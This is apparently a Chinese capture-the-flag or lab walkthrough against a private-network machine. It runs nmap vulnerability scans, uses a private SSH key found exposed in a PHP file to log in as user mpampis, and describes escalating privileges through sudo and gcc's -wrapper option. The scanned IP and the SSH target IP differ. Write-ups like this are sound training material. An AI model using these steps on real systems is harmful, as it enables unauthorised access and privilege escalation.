端口扫描
nmap -p- 192.168.248.140
详细信息扫描
nmap -sT -sV -sC -O --script=vuln -p22,80 192.168.248.140
80端口发现有一个php文件
/d41d8cd98f00b204e9800998ecf8427e.php
可以发现这是一个私钥文件,保存为 id_rsa
chmod 600 id_rsa #修改权限
获取私钥的公钥信息
ssh-keygen -y -f id_rsa > id_rsa.pub
三、getshell
利用生成的私钥进行登录
ssh -i id_rsa mpampis@192.168.0.177
四、提权
sudo -l
gcc直接提权
gcc是常见的C语言编译工具,至于如何利用这个工具提权,可疑参考开源项目GTFOBins,详情见:
这里还是做个解释:用-wrapper指定包装器,在包装器中添加启动shell的指令,,-s是bash的参数,指定从标准输入读取命令,保证读取到EOF时不会退出,点.表示编译的内容,此时我们并不关心编译啥,随便给个当前目录.即可。